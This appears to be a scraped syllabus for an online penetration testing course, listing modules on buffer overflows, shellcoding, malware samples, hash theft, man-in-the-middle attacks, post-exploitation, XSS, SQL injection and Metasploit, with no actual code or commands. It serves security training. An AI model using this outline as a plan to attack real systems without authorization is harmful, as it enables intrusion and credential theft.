Syllabus: Penetration Testing Course - Professional Version 4.0

Download as pdf or txt
Download as pdf or txt
You are on page 1of 35
At a glance
Powered by AI
The key takeaways are that the course covers penetration testing techniques across 5 domains, includes hands-on labs and materials to prepare students for certification and jobs in security testing.

The System Security section covers x86 architecture fundamentals, assemblers, debuggers, buffer overflows, shellcoding, cryptography, and malware.

The Assemblers, Debuggers and Tools Arsenal module discusses assemblers like NASM, compilers, debuggers like Immunity Debugger and IDA, and decompiling tools.

The World’s Premier Online

Penetration testing course

PTPv4 at a glance:

 Self-paced, online, flexible


access

 5500+ interactive slides and


14 hours of video material

 Five top level authors Penetration Testing Course - Professional Version 4.0

SYLLABUS
 Five knowledge domains

 In depth coverage of every


technique

 27 virtual labs for Network,


System and Web Application
Security hands-on sessions

 Dozens of real world vulnerable


networks and websites

 Reporting skills covered in depth

 Prepares for eCPPT certification

 Prepares for real world


Penetration testing jobs

This training course has been chosen


by students in 140 countries in the
world and by leading organizations Course home page:
such as: http://www.elearnsecurity.com/course/penetration_testing/
System Security Section
System security section will provide you with thorough understanding of x86
Architecture and its weaknesses.

- Module 1: Architecture Fundamentals



- Module 2: Assembler Debuggers and Tool Arsenal
- Module 3: Buffer Overflow 

- Module 4: Shellcoding 

- Module 5: Cryptography and Password Cracking 

- Module 6: Malware

Module 1: Architecture Fundamentals


1. Architecture Fundamentals
1.1. Introduction
In this module, you will learn 1.2. Architecture Fundamentals
fundamental concepts 1.2.1. CPU, ISA and Assembly
needed to help you improve 1.2.2. Registers
your skills in topics such as 1.2.3. Process Memory
1.2.4. The Stack
fuzzing, exploit development,
1.2.4.1. PUSH Instruction
buffer overflows, debugging, 1.2.4.2. POP Instruction
reverse engineering and 1.2.4.3. Procedures and Functions
malware analysis. 1.2.4.4. Stack Frames
1.2.4.5. Prologue
Sample source codes of C++ 1.2.4.6. Epilogue
and Assembly language are 1.2.5. Endianness
provided in order to get the 1.2.6. NOPs
student familiar with these 1.3. Security Implementations
1.3.1. ASLR
languages.
1.3.2. DEP
1.3.3. Stack Cookies (Canary)

Hera Labs are included in this module


Module 2: Assemblers, Debuggers and Tools Arsenal
2. Assemblers, Debuggers and Tools Arsenal
2.1. Introduction
The previous module showed 2.2. Assembler
you that Assembly is a very MASM
low-level programming GAS
language consisting of NASM
FASM
mnemonic code, also known
2.3. Compiler
as opcode (operation code). 2.4. NASM
2.4.1. Installation Instructions
Although it is a low-level
2.4.2. ASM Basics
language, it still needs to be 2.4.3. Intel vs AT&T
converted into machine code 2.4.4. PUSH Instruction
in order for the machine to 2.4.5. POP Instruction
execute. 2.4.6. CALL Instruction
2.5. Tools Arsenal
In this module you will see 2.5.1. Compilers
how this happens and what Microsoft Visual C/C++
tools are required. Orwell Dev-C++
MinGW
2.5.2. Debuggers
Immunity Debugger
IDA
GDB
WinDBG
Hopper
OllyDBG
2.5.3. Decompiling

Module 3: Buffer Overflows


3. Buffer Overflows
3.1. Understanding Buffer Overflows
Finding and exploiting buffer Strcpy and Strncpy
overflows in real world Samples and code observation
applications is what you will Visual Studio
learn during this incredibly NULL bytes
3.2. Finding Buffer Overflows
hands-on module.
3.2.1. Finding Buffer Overflows in binary
A hard topic made easy programs
3.2.2. Code Observation
through examples explained
3.2.3. Overflow the Buffer
step by step -starting from 3.3. Exploiting Buffer Overflows
the very basics of stack 3.3.1. Finding the right offset
manipulation. Pattern Create
Armed with assemblers, Pattern Offset
compilers and debuggers, the Mona
students will learn how to 3.3.2. Overwriting the EIP
3.4. Exploiting a Real-World Buffer Overflow
hijack the execution of
3.5. Security Implementations
applications. 3.5.1. Helpful Tools
3.5.2. Address Space Layout Randomization
At the end of the module,
3.5.2.1. Bypass Technique
the student is exposed to the 3.5.2.2. Protective Measures
most modern techniques 3.5.3. Data Execution Prevention
used to prevent Buffer 3.5.3.1. Bypass Technique
overflows and the main 3.5.3.2. Protective Measures
methods to bypass them. 3.5.4. Stack Canary and SafeSEH
3.5.4.1. Bypass Technique
3.5.4.2. Protective Measures

Module 4: Shellcoding
4. Shellcoding
4.1. Execution of a Shellcode
The art of Shellcoding is 4.2. Types of Shellcode
made available to anyone Local
through easy to understand Remote (Connect Back, Bind, Socket Reuse)
samples and real world Staged / Egg-hun / Omelet
4.3. Encoding of Shellcode
complex scenarios.
4.3.1. NULL-free Encoding
4.3.2. Alphanumeric and Printable Encoding
A small part of theoretical
4.4. Debugging a Shellcode
aspects will introduce the
4.5. Creating our first Shellcode
practical examples where 4.5.1. Finding Function Addresses
you will actually create your 4.5.2. Creating a small ASM code
own shellcode through the 4.6. A more advanced Shellcode
use of compilers and 4.6.1. String Terminator
assemblers. 4.6.2. NULL-Free Shellcode
4.6.3. Manual Editing
Different techniques are 4.6.4. Encoder tools
shown in order to let you 4.7. Shellcode and Payload Generators
4.7.1. Msfvenom
create your own shellcode.
Module 5: Cryptography and Password Cracking
Almost all penetration test 5. Cryptography & Password Cracking
engagements require the 5.1. Introduction
understanding of cryptographic topics. 5.2. Classification
5.3. Cryptographic Hash Function
This module will ensure that you are 5.4. Public Key Infrastructure
current with the most common 5.5. PGP
5.6. Secure Shell (SSH)
cryptographic technologies, algorithms
5.6.1. SSH Tunneling
and tools. 5.7. Cryptographic attacks
5.8. Security pitfalls in implementing
You will also learn how to perform
Cryptography Systems
advanced password cracking using the 5.9. Windows Passwords
best tools available. 5.9.1. LM and NT hashes
5.9.2. SAM
A thorough review of the most modern 5.9.3. Stealing hashes – Remote
tools used to steal and crack Windows 5.9.4. Stealing hashes – Local
password hashes is provided. 5.9.5. Stealing hashes – Live host
5.9.6. Stealing hashes – Offline
5.9.7. Pass the hash
5.9.8. Cracking the hash

Module 6: Malware
6. Malware
6.1. Classification
A thorough and detailed classification 6.2. Techniques used by Malware
of types of malware is the introduction 6.2.1. Streams
to a module featuring the most 6.2.2. Hooking SSDT
advanced and obscure techniques used 6.2.3. Hooking IRP
6.2.4. Hiding a process
by modern malwares.
6.2.5. API Hooking
6.2.5.1. IAT Hooking
6.2.5.2. EAT Hooking
The module is enriched as three 6.2.5.3. Inline Hooking
6.2.6. Anti-Debugging methods
malware source codes are dissected
6.2.7. Anti-Virtual machine methods
and explained: a Keylogger, a Trojan 6.2.8. Obfuscation
and a Virus. 6.2.9. Packers
6.2.10. Polymorphism
6.2.11. Metamorphism
6.2.11.1. Garbage Insertion
6.2.11.2. Registers Exchange
6.2.11.3. Permutation
6.3. How malware spreads
6.3.1. Null free shellcode
6.3.2. Alphanumeric shellcode
6.3.3. Percentage encoding
6.4. Real world Samples
6.4.1. Sample 1: Keylogger
6.4.2. Sample 2: Trojan
6.4.3. Sample 3: Virus
Network Security Section
Network security section will deal with the security testing methodology,
techniques and tools for networked PC and devices.

- Module 1: Information Gathering 


- Module 2: Scanning 
- Module 3: Enumeration 
- Module 4: Sniffing and MITM attacks 
- Module 5: Exploitation 
- Module 6: Post-exploitation
- Module 7: Anonymity
- Module 8: Social Engineering

Module 1: Information Gathering


1. Information Gathering
1.1. Introduction
The Information Gathering module is 1.2. OSINT / Search Engines
the most important phase of the overall 1.2.1. Organization Web Presence
engagement. 1.2.2. Finding government contracts
1.2.3. Partners and third parties
A Penetration tester will use the 1.2.4. Job postings
information collected during this phase 1.2.5. Financial information
to map the attack surface and increase 1.2.6. Information Harvesting
1.2.6.1. theHarvester
his chances to breach the organization
1.2.7. Cached information
in the same way criminals do. 1.3. OSINT / Social Media
1.3.1. People search and investigation
eLearnSecurity proposes an extremely 1.3.2. Real world information
thorough investigation methodology gathering against eLSFoo
that takes into account the Business 1.4. Infrastructure information gathering
and the Infrastructure of the client. 1.4.1. Domains
1.4.1.1. DNS Enumeration
Students will learn how to get access to 1.4.1.2. IP’s
valuable, sensitive and sometimes 1.4.1.3. Bing
secret documents by means of free 1.4.1.4. Netblocks & AS’s
services, databases and specialized 1.4.2. Netblocks
1.4.2.1. Live hosts
search engines.
1.4.2.2. Further DNS
1.4.3. Maltego
Infrastructure Information gathering
1.5. Tools
will deal with the enumeration of DNS, 1.5.1. DNSdumpster
Domains, netblocks and other web 1.5.2. DNSEnum
assets belonging to the organization. 1.5.3. DNSMap
1.5.4. Foca & Shodan
Hera Labs are included in this module. The student is also required to conduct an
investigation against a real company
Module 2: Scanning
2. Scanning
2.1. Introduction
As one of the most important steps in 2.1.1. Ports, Protocol and Services
the penetration test of a network, this 2.1.2. The Three Way Handshake
module will first teach you the theory 2.1.2.1. Crafting Packets
behind port scanning and service 2.2. Detect Live hosts and open Ports
2.2.1. Tools
reconnaissance.
2.2.1.1. Nmap
If you are not a network expert, the 2.2.1.1.1. SYN scan
2.2.1.1.2. Connect scan
first chapters of this module will
2.2.1.1.3. UDP scan
introduce you to the basics of TCP and 2.2.1.1.4. Idle scan
other network protocols. 2.2.1.1.5. NULL / FIN / Xmas
2.2.1.1.6. ACK scan
We will then show you how to use the 2.2.1.1.7. IP scan
best tools to detect live hosts, open 2.2.1.1.8. Nmap NSE
ports and services running on them. 2.2.1.2. Hping
2.2.1.3. Other Tools
Through Nmap and Hping2, you will 2.3. Service and OS Detection
learn how to find zombies to mount 2.3.1. Banner Grabbing
completely stealth port scans against a 2.3.2. Probing Services
target. 2.3.3. OS Fingerprinting
2.3.3.1. Active Fingerprinting
Passive and Active OS fingerprinting 2.4. Firewall/IDS Evasion
2.4.1. Fragmentation
techniques will also be covered in
2.4.2. Decoys
depth. 2.4.3. Timing
2.4.4. Source Ports

Hera Labs are included in this module


Module 3: Enumeration
3. Enumeration
3.1. Introduction
Scope of this module is to provide you 3.2. NetBIOS
with the techniques professional 3.2.1. What is NetBIOS
penetration testers employ to 3.2.2. How NetBIOS works
enumerate resources on target. 3.2.3. SMB
3.2.4. NetBIOS commands and tools
You will be able to explore, enumerate 3.2.4.1. Nbtstat
and map the remote network and its 3.2.4.2. Nbtscan
3.2.4.3. Net command
available services through a number of
3.2.4.4. Smbclient and mount
different Windows and Unix tools. 3.2.4.5. Null Session
3.2.4.5.1. Winfingerprint
NetBIOS is the subject of the first part 3.2.4.5.2. Winfo
of this module: real world examples will 3.2.4.5.3. DumpSec
be explained to show most important 3.2.4.5.4. Enum4Linux
techniques and tools to enumerate 3.2.4.5.5. RPCClient
remote Windows shares and printers. 3.3. SNMP
3.3.1. What it is
You will also learn how to test for 3.3.2. How it works (Agents, MIB, OID)
NetBIOS Null Sessions that still affect 3.3.3. SNMP Attacks
old Windows versions. 3.3.3.1. Enumeration
3.3.3.2. Obtaining community
SNMP basics will be explained. The strings
3.3.3.3. SNMPWalk
student will then be introduced to
3.3.3.4. SMBPSet
attacks against the protocols through a 3.3.3.5. Nmap SNMP Scritps
number of common tools.
Module 4: Sniffing & MITM
4. Sniffing & MITM
4.1. What sniffing means
Studying ARP, how it works and how it 4.1.1. Why it is possible
can be manipulated to mount 4.2. Sniffing in action
sophisticated attacks is made extremely 4.2.1. Passive Sniffing
easy to understand. 4.2.2. Active Sniffing
4.2.2.1. MAC Flooding
Sniffing is a technique that you will be 4.2.2.2. ARP Poisoning
able to fully grasp in its most practical 4.3. Basic of ARP
4.3.1. Gratuitous ARP
aspects.
4.3.2. ARP Poisoning
4.3.2.1.1. Host poisoning
We will make sure you have enough
4.3.2.1.2. Gateway poisoning
basics of network theory before we 4.4. Sniffing tools
cover actual attack scenarios using the 4.4.1. Dsniff
best tools available. 4.4.2. Wireshark
4.4.3. TCPDump
Man in the middle attacks are one of 4.4.4. WinDump
the most used penetration testing 4.5. Man in the middle (MITM) attacks
techniques today; you will be able to 4.5.1. What they are
mount man in the middle attacks within 4.5.2. ARP Poisoning for MITM
local networks and over the Internet. 4.5.3. Local to Remote MITM
4.5.4. DHCP Poisoning
4.5.5. MITM in Public Key exchance
4.5.6. Attacking Tools
4.5.6.1. Ettercap
4.5.6.1.1. SSL Sniffing
4.5.6.2. Cain&Abel
4.5.6.3. Macof
4.5.6.4. Arpspoof
4.5.6.5. Bettercap
4.6. Intercepting SSL traffic
4.6.1. SSLStrip & Ettercap
4.6.2. HSS Bypass
Module 5: Vulnerability Assessment & Exploitation
5. VA & Exploitation
5.1. Vulnerability Assessment
This module will teach the student how 5.1.1. Vulnerability Scanners
to master Nessus in order to perform 5.1.2. Nessus
thorough and targeted Vulnerability 5.2. Low Hanging Fruits
scans with Nessus. 5.2.1. Weak Password
5.2.1.1. Ncrack
Windows authentication protocols are 5.2.1.2. Medusa
dissected to demonstrate weaknesses 5.2.1.3. Patator
5.3. Exploitation
and related attacks from Metasploit.
5.3.1. Metasploit intro
5.3.2. Windows Authentication
The student is then immersed in
Weaknesses
common exploitation techniques used 5.3.2.1. LM/NTLMv1
by today’s Penetration testers, to 5.3.2.2. NTLMv2
exploit client side and remote 5.3.2.3. SMB Relay on NTLMv1
vulnerabilities in Workstations and 5.3.2.4. SMB Relay on NTLMv2
Servers. 5.3.3. Client-Side exploitation
5.3.4. Remote-Side Exploitation
The module is video and lab intensive.

Hera Labs are included in this module


Module 6: Post Exploitation
6. Post Exploitation
6.1. Introduction
eLearnSecurity experienced instructors 6.1.1. Maintaining access and clean-up
have come up with a proven 6.1.2. Permanent edits
methodology to conduct thorough 6.2. Privilege escalation and Maintaining
Exploitation of remote internal access
6.2.1. Privilege escalation
networks through advanced Post
6.2.1.1. Stable
exploitation techniques. 6.2.1.2. Windows Privilege
Escalation
Once the student is comfortable with
6.2.1.2.1. Incognito
most recent exploitation techniques, he 6.2.1.3. Linux Privilege Escalation
will be exposed to the cyclic steps of a 6.2.2. Maintaining access
successful Post exploitation phase. 6.2.2.1. Password and Hashes
6.2.2.1.1. Pass the hash
This is the phase where criminals 6.2.2.1.2. Cracking Hashes
ensure stable high privileged access to 6.2.2.1.3. Mimikatz
the remote network in order to steal 6.2.2.1.4. Windows
and ex-filtrate documents and Credentials Editor
6.2.2.2. Enable RDP Service
credentials from the organization.
6.2.2.3. Backdoors
Penetration testers must possess the 6.2.2.3.1. Persistence
6.2.2.3.2. Manual Installation
same skill-set and tools in order to test
6.2.2.4. New Users
not only the perimeter security but also 6.3. Pillaging
any kind of internal weakness that Determining machine role in the
affects the organization security. remote network
Harvesting documents
This is a video and hands-on intensive Harvesting stored credentials
module Harvesting web browsers data
Keylogging
Services
6.4. Mapping the Internal Network
ARP Scanning
Pivoting
Port scanning internal network
6.5. Exploitation through Pivoting
Hera Labs are included in this module
Module 7: Anonymity
7. Anonymity
7.1. Browsing Anonymously
Penetration testers rarely need to cover 7.1.1. HTTP Proxies
their tracks. 7.1.1.1. Anonymous proxies
7.1.1.2. Transparent proxies
However, there are times when testing 7.1.2. Tor Network
the efficiency of the target organization 7.2. Tunneling for Anonymity
incident response team is within the 7.2.1. SSH Tunneling
scope of a Penetration tester’s
engagement. This module will teach
techniques to perform your tests while
covering your tracks.

Module 8: Social Engineering


8. Social Engineering
8.1. What is Social Engineering
Social engineering module will guide 8.2. Types of Social Engineering
you through the most modern social 8.2.1. Pretexting
engineering attack techniques. 8.2.2. Phishing
8.2.3. Baiting
Real world attacks will be illustrated by 8.2.4. Physical
exploiting the potential of social 8.3. Samples of Social Engineering
attacks
networks such as Facebook, Spokeo or
8.3.1. Canadian Lottery
Twitter.
8.3.2. FBI E-mail
8.3.3. Online Banking
Almost one hour of video lessons will
8.4. Pretexting samples
teach you everything you need to know 8.5. Tools
to master the most important tool in 8.5.1. Social Engineering Toolkit
the field: Social Engineering Toolkit.
Web Application Security Section
Today’s Penetration testers have to master web application attack
techniques; this lab intensive section will teach the student how to conduct a
thorough Penetration test against web applications.

- Module 1: Introduction

- Module 2: Information Gathering

- Module 3: Cross site scripting

- Module 4: SQL Injection

- Module 5: Other Common Web Attacks

Module 1: Introduction
1. Introduction to Web Applications
1.1. HTTP/S Protocol Basics
This module will introduce you to 1.1.1. HTTP Request
the web application security field 1.1.2. HTTP Response
and its basic terminology. 1.1.3. HTTP Header Field Definition
1.1.4. HTTPS
If you are new to this field, you will 1.2. Encoding
gather all the skills you need to 1.2.1. Introduction
move to more advanced modules. 1.2.2. Chraset
1.2.2.1. Unicode Encoding
If you are already an advanced web 1.2.2.2. HTML Encoding
1.2.2.3. URL Encoding
application security tester, you will
1.2.2.4. Base64
get introduced to the methodology 1.3. Same Origin
and tools followed throughout the 1.3.1. Origin Definition
course. 1.3.2. What does SOP protect from?
1.3.3. How SOP works
1.3.3.1. Example 1
1.3.3.2. Example 2
1.3.4. Exceptions
1.3.4.1. Windows.location
1.3.4.1.1. Example
1.3.4.1.2. Security Issues
1.3.4.2. Document.domain
1.3.4.2.1. Example
1.3.4.3. Cross Window Messaging
1.3.4.4. CORS
1.4. Cookies
1.4.1. Cookies Domain
1.4.1.1. Specified Cookie Domain
1.4.1.2. Unspecified Cookie Domain
1.4.1.3. IE Exception
1.4.2. Inspecting the Cookie Protocol
1.4.3. Cookie Installation
1.4.3.1. Correct Cookie Installation
1.4.3.2. Incorrect Cookie Installation
1.5. Sessions
1.6. Web Application Proxies
1.6.1. Burp Suite
1.6.2. OWASP ZAP
Hera Labs are included in this module

Module 2: Information Gathering


2. Information Gathering
2.1. Gathering Information On Target
Web application information gathering 2.1.1. Finding Owner, IP Addresses
is a long and complex process. and Email Addresses
2.1.1.1. WHOIS tools
It takes insight and perseverance. 2.1.1.2. DNS
2.1.1.3. Nslookup and Netcraft
You will learn the best methodologies 2.2. Infrastructure
to collect and store information about 2.2.1. Fingerprinting The Webserver
your target web assets. 2.2.1.1. Netcat
2.2.1.2. WhatWeb
This information will be used at later 2.2.1.3. Wappalyzer
steps in the exploitation process. 2.2.1.4. Fingerprinting Webserver
Modules
At the end of this module, you will have 2.2.2. Enumerating Subdomains
so much information on your target 2.2.2.1. Netcraft
that exploiting it will be easy and fun. 2.2.2.2. Google
2.2.2.3. Other tools
2.2.2.3.1. Subbrute
2.2.2.3.2. DNSrecon
2.2.2.3.3. theHarvester
2.2.2.4. ZoneTransfer
2.2.3. Finding Virtual Hosts
2.3. Fingerprinting Frameworks and
Applications
2.3.1. Fingerprinting Third-Party Add-
Ons
2.3.2. Map
2.4. Fingerprinting Custom Applications
2.4.1. Burp Target Crawler
2.4.2. Creating Functional Graph
2.4.3. Mapping the Attack Surface
2.4.3.1. Client-Side Validation
2.4.3.2. Database Interaction
2.4.3.3. File Uploading and
Downloading
2.4.3.4. User Supplied Data
2.4.3.5. Redirection
2.4.3.6. Access Controls
2.4.3.7. Error Messages
2.4.3.8. Charting
2.5. Enumerating Resources
2.5.1. Crawling The Website
2.5.2. Finding Hidden Files
2.5.2.1. Back Up and Source Code
2.5.3. Enumerating users
2.6. Relevant Information Through
Misconfigurations
2.6.1. Directory Listing
2.6.2. Log and Configuration Files
2.6.3. HTTP Verbs and File Upload
2.7. Google Hacking
2.8. Shodan HQ

Hera Labs are included in this module

Module 3 Cross site scripting


3. Cross Site Scripting
3.1. Cross site scripting
The most widespread web application 3.1.1. Basics
vulnerability will be dissected and 3.2. Anatomy of a XSS exploitation
studied thoroughly. 3.3. The three types of XSS
3.3.1. Reflected XSS
At first, you will be provided with 3.3.2. Persistent XSS
theoretical explanation. This 3.3.3. DOM-based XSS
understanding will help you in the 3.4. Finding XSS
3.4.1. Finding XSS
exploitation and remediation process.
3.5. XSS Exploitation
3.5.1. XSS and Browsers
Later, you will master all the techniques
3.5.2. XSS Attacks
to find XSS vulnerabilities through black 3.5.2.1. Cookie stealing through
box testing and within PHP code. XSS
3.5.2.2. Defacement
Real world exploitation examples will 3.5.2.3. XSS for Advanced phishing
conclude the module; you will finally attacks
steal session cookies, modify website 3.5.2.4. Beef
DOM and perform advanced phishing 3.6. Mitigations
attacks. 3.6.1. Input Validation
3.6.2. Context-aware Output Encoding
This is a hands-on intensive module. 3.6.3. Never trust user input

Hera Labs are included in this module


Module 4: SQL Injection
4. SQL Injection
4.1. Introduction to SQL Injection
This module will contain the most 4.1.1. SQL Statements
advanced techniques to find and 4.1.1.1. SELECT
exploit SQL Injections. 4.1.1.2. UNION
4.1.2. SQL Queries in WebApps
From the explanation of the most basic 4.1.3. Vulnerable Dynamic Queries
SQL injection to the most advanced. 4.1.4. How Dangerous is a SQLi
4.1.5. SQLi Attack Classification
Advanced methods will be taught with 4.1.5.1. In-Band SQLi
real world examples and the best tools 4.1.5.2. Error-Based SQLi
4.1.5.3. Blind SQLi
will be demonstrated on real targets.
4.2. Finding SQL injections
You will not be able to just dump 4.2.1. Simple SQL injection
4.2.2. SQL Errors in WebApps
remote databases but also get root on
4.2.3. Boolean Based Detection
the remote machine through advanced 4.3. Exploiting In-Band SQLi
SQL Injection techniques. 4.3.1. Scenario
4.3.2. In-band attack Challenges
Tools will be covered in depth and a 4.3.3. Enumerating the number of
taxonomy will help the student to pick fields
the right tool according to the 4.3.3.1. Different DBMS UNION
environment and scenario he will face Mismatch Errors
in real engagements. 4.3.4. Blind Enumeration
4.3.5. Identifying fields types
This is a video and hands-on intensive 4.3.6. Dumping database content
module 4.4. Exploiting Error Based SQL Injections
4.4.1. MS SQL Server Error-based
exploitation
4.4.2. The CAST Technique
4.4.3. Finding the DBMS Version
4.4.4. Dumping the database
4.4.4.1. Finding the current
username
4.4.4.2. Finding readable
databases
4.4.4.3. Enumerating Databases
tables
4.4.4.4. Enumerating Columns
4.4.4.5. Dumping Data
4.4.4.6. MySQL Error-based SQLi
Exploitation
4.4.4.7. PostgreSQL Error-based
SQLi Exploitation
4.4.4.8. Developing Erro-based
SQLi Payloads
4.5. Exploiting Blind SQL Injection
4.5.1. Exploitation Scenario
4.5.2. Detecting the current user
4.5.3. Scripting blind SQLi Data Dump
4.5.4. Exploiting Blind SQLi
4.5.4.1. String extraction
4.5.5. Optimized Blind SQLi
4.5.6. Time-based Blind SQLi
4.5.7. Time Based SQL Injections
4.6. SQLMap
4.6.1. Basic Syntax
4.6.2. Extracting database banner
4.6.3. Information Gathering
4.6.4. Extracting the Database
4.6.5. Extracting the Schema
4.6.6. SQLMap Advanced Usage
4.6.6.1. Forcing the DBMS
4.6.6.2. Fine Tuning the Payloads
4.6.6.3. Aggressiveness and Load
4.7. Mitigation Strategies
4.7.1. Prepared Statements
4.7.2. Type Casting
4.7.3. Input Validation
4.8. From SQLi to Server Takeover
4.8.1. Advanced SQL Server
Exploitation
4.8.1.1. Xp_cmdshell
4.8.1.2. Internal Network Host
Enumeration
4.8.1.3. Port Scanning
4.8.1.4. Reading the File System
4.8.1.5. Uploading Files
4.8.1.6. Storing Command Results
4.8.2. Advanced MySQL Exploitation
4.8.2.1. Reading the File System
4.8.2.2. Uploading Files
4.8.2.3. Executing Shell Commands
Hera Labs are included in this module
Module 5: Other Common Web Attacks
5. Other Common Web Attacks
5.1. Introduction
Sophisticated attacks against web 5.2. Session attacks
applications are the subject of this 5.2.1. Weaknesses of the Session
module. Identifier
5.2.2. Session Hijacking
Session Fixation and CSRF are often 5.2.3. Session Hijacking Attacks
underestimated and overlooked 5.2.3.1. Exploit Session Hijacking
vulnerabilities. They will be covered in via XSS
5.2.3.2. Preventing Session
depth.
Hijacking
5.2.3.3. Session Hijacking via
A working exploit will be created step
Packet Sniffing
by step to demonstrate a CSRF 5.2.3.4. Session Hijacking via
vulnerability found in a famous CMS. Access to the web server
5.2.4. Session Fixation Attack
5.2.4.1. Set the sessionID
5.2.4.2. Force the victim
5.2.4.3. Vulnerable Web
Application
5.2.5. Preventing Session Fixation
5.3. Cross Site Request Forgery
5.3.1. Finding CSRF
5.3.2. Exploiting CSRF
5.3.3. Preventing CSRF
5.3.3.1. Why this works?
5.4. File and Resources Attacks
5.4.1. Path Traversal
5.4.1.1. Path Convention
5.4.1.2. Encoding
5.4.1.3. Best Defensive Techniques
5.4.2. File Inclusion Vulnerabilities
5.4.2.1. Local File Inclusion
5.4.2.2. Remote File Inclusion
5.4.2.3. Unrestricted File Upload
Hera Labs are included in this module
Ruby for Pentesters and Metasploit Section
Ruby for Pentesters and Metasploit section covers Ruby programming
techniques from the very basics to advanced and penetration testing topics.
Once the student masters the Ruby programming language and its features,
this section covers topics such as exploit vulnerable application with Ruby as
well as creating and editing Metasploit modules.

- Module 1: Ruby Basic: Installation and Fundamentals


- Module 2: Ruby Basic: Control structures
- Module 3: Ruby Basic: Methods, Variables and Scope
- Module 4: Ruby Advanced: Classes, Modules and Exceptions
- Module 5: Ruby Advanced: Pentester prerequisites 
- Module 6: Ruby for Pentesters: Input / Output
- Module 7: Ruby for Pentesters: Network and OS interaction
- Module 8: Ruby for Pentesters: The Web
- Module 9: Ruby for Pentesters: Exploitation with Ruby
- Module 10: Ruby for Pentesters: Metasploit

Module 1: Installation and Fundamentals


1. Installation and Fundamentals
1.1. Installation & First Look
In this first module of the Ruby section, 1.1.1. Installation
the student will see how to install and 1.1.1.1. Windows Installation
configure the environment in order to 1.1.1.2. Other system
work with Ruby. 1.1.1.3. Suggestions
1.1.2. Getting started
Once the environment is configured, 1.1.2.1. Ruby from a file
1.1.2.2. Ruby from command line
the student will learn the very basic
1.1.2.3. Interactive Ruby
concepts of Ruby such as running and
1.1.2.4. Suggestions
writing scripts, using the interpreter, 1.1.3. Power of Ruby
installing gems and much more. The 1.1.3.1. Interactive calculator
student will also learn the basic 1.1.3.2. Ruby one liners
concept of Ruby such as data types, 1.1.3.3. Suggestions
variables declarations and more. 1.1.4. Libraries
1.1.4.1. Ruby gems
1.2. Data Types
1.2.1. Numbers
1.2.1.1. Integer
1.2.1.2. Float
1.2.1.3. Numeric
1.2.1.4. Anticipation
1.2.1.5. Comments
1.2.2. Strings
1.2.2.1. Single or Double quotes?
1.2.2.2. Alternative Ruby Quotes
1.2.2.3. Info about strings
1.2.2.4. “Here document” notation
1.2.2.5. String arithmetic
1.2.2.6. Interpolation
1.2.2.7. Some useful methods
1.2.3. Arrays
1.2.3.1. Array creation
1.2.3.2. Accessing array elements
1.2.3.3. Multi-typed array
1.2.3.4. Multi-dimensional array
1.2.3.5. Variables and arrays
1.2.3.6. Insertions
1.2.3.7. Deletion
1.2.3.8. Operations between arrays
1.2.3.9. Stack
1.2.3.10. Some useful methods
1.2.3.11. Array and Strings
1.2.4. Ranges & Hashes
1.2.4.1. Ranges (fundamental)
1.2.4.2. Ranges (methods)
1.2.4.3. Ranges and variables
1.2.4.4. Hashes (fundamental)
1.2.4.5. Hashes (methods)

Downloadable scripts are included in this module.


Module 2: Control Structures
2. Control Structures
2.1. Comparison operator
One of the most important program 2.2. Conditionals
structures that a programmer has to 2.2.1. if
master is the ‘flow control structure’. 2.2.2. unless
2.2.3. case
In this module, the student will learn 2.2.4. Ternary operator
how to write and define different types 2.3. Loops
of Ruby control structures. This will 2.3.1. while
2.3.2. until
allow the student to create scripts and
2.3.3. for
programs that are not limited to a 2.4. Iterators & Enumerators
linear sequence of statements. 2.4.1. Iterators
2.4.2. Enumerable objects
2.4.3. Enumerator
2.4.4. External iterators
2.4.5. Conclusion
2.5. Altering structured control flow
2.5.1. break
2.5.2. next
2.5.3. redo
2.5.4. some consideration
2.6. BEGIN / END

Downloadable scripts are included in this module.

Module 3: Methods, Variables and Scope


3. Methods, Variables and Scope
3.1. Methods
Every program must be clean and have 3.1.1. Simple method definitions
reusable structures. 3.1.2. Parentheses
3.1.3. alias
In this module, the student will learn 3.1.4. parameters default values
how to define and use Ruby methods, 3.1.5. variable length arguments
blocks, aliases and more. This is useful 3.1.6. hashes as arguments
for creating very powerful tools and 3.1.7. block arguments
3.1.8. bang methods
scripts.
3.1.9. returned values
3.2. Variables & Scope
3.2.1. Variables Types
With the introduction of methods and 3.2.2. local variables
3.2.3. global variables
blocks, a very important topic needs to
3.2.4. Instance & Class Variables
3.2.5. Constants
be covered: the scope. 3.2.6. Some tricks

Downloadable scripts are included in this module.

Module 4: Classes, Modules and Exceptions


4. Classes, Modules and Exceptions
4.1. Classes principles
Ruby is an Object Oriented Programming 4.1.1. A simple class
language. With that said, an OO program 4.1.2. Instance variables
involves classes and objects. 4.1.3. Getter/Setter through
Metaprogramming
In this module, we will start covering more 4.1.4. Class Methods
advanced topics and we will see how to 4.1.5. Class Variables
define and use classes, functions, modules, 4.1.6. Constants
4.1.7. More about classes
mixin, namespaces and much more.
4.1.8. Open classes
4.1.9. Operator methods
Along with these topics, we will also see
4.1.10. Mutable/Immutable values
how to handle exceptions; exceptions are a 4.2. Method visibility
very useful topic that needs to be 4.2.1. Private methods
mastered in order to take control of the 4.2.2. Protected methods
program behavior. 4.2.3. A full view
4.3. Subclassing & Inheritance
4.3.1. Simple extensions
4.3.2. Methods overriding
4.3.3. Specialize a method
4.3.4. Instance and Class Variables
4.3.5. Constants
4.3.6. private methods
4.3.7. protected methods
4.4. Modules
4.4.1. Namespace
4.4.2. Mixin
4.4.2.1. Namespace and Mixin
4.5. Exception
4.5.1. Raise
4.5.1.1. RuntimeError
4.5.1.2. Other Errors
4.5.1.3. CustomError
4.5.2. Rescue
4.5.2.1. Simple Rescue
4.5.2.2. Exception Objects
4.5.2.3. Type based Exception
handling
4.5.2.4. Rescue as a statement
modifier
4.5.3. Other clause
4.5.3.1. retry
4.5.3.2. else
4.5.3.3. ensure
4.5.4. Methods, Classes and Modules
4.6. Conclusion
4.6.1. The point
4.6.2. Ruby is much more

Downloadable scripts are included in this module.

Module 5: Pentesters prerequisites


5. Pentesters Prerequisites
5.1. Regular expressions
Ruby is a very powerful programming 5.1.1. Basic concepts
language and thanks to its many 5.1.1.1. A quick example
features, it can be used for many 5.1.1.2. Regexp object
different purposes. 5.1.1.3. Regexp modifier
5.1.1.4. Match method
From this module on, we will focus on 5.1.1.5. Special characters
how to use Ruby for penetration testing 5.1.2. Regular Expressions Syntax
5.1.2.1. Character classes
purposes. One of the first topics we will
5.1.2.2. Sequences
cover is ‘Regular Expression’. 5.1.2.3. Alternatives
5.1.2.4. Groups
